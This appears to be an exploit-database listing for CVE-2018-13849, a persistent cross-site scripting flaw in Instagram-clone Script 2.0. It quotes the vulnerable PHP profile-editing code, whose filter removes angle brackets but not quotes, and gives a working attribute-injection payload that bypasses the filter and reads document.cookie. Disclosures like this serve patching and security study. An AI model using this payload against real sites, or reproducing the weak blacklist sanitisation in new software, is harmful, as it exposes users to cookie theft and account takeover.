Lucene search

K
zdtL0RD1337DAY-ID-30700
HistoryJul 11, 2018 - 12:00 a.m.

Instagram-Clone Script 2.0 - Cross-Site Scripting Vulnerability

2018-07-1100:00:00
L0RD
0day.today
43

0.001 Low

EPSS

Percentile

45.7%

Exploit for php platform in category web applications

# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# CVE: CVE-2018-13849
# Tested on: Kali linux
 
# POC : Persistent Cross site scripting :
# vulnerable file : edit_requests.php
# vulnerable code :
 
if (isset($_POST['username'])) {
      $username = preg_replace("#[<> ]#i", "", $_POST['username']);
      $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
      $surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
      $bio = preg_replace("#[<>]#i", "", $_POST['bio']);
      $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
      $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
      $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
      $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
      $website = preg_replace("#[<>]#i", "", $_POST['website']);
      $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
      $tags = preg_replace("#[\s]#", "-", $_POST['tags']);
 $session = $_SESSION['id'];
 
      $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
      $array = array("mssg" => $m);
      echo json_encode($array);
    }
 
# We use this payload to bypass filter :
# Payload : 
 
"onmouseover=" alert(document.cookie)

#  0day.today [2018-07-11]  #

0.001 Low

EPSS

Percentile

45.7%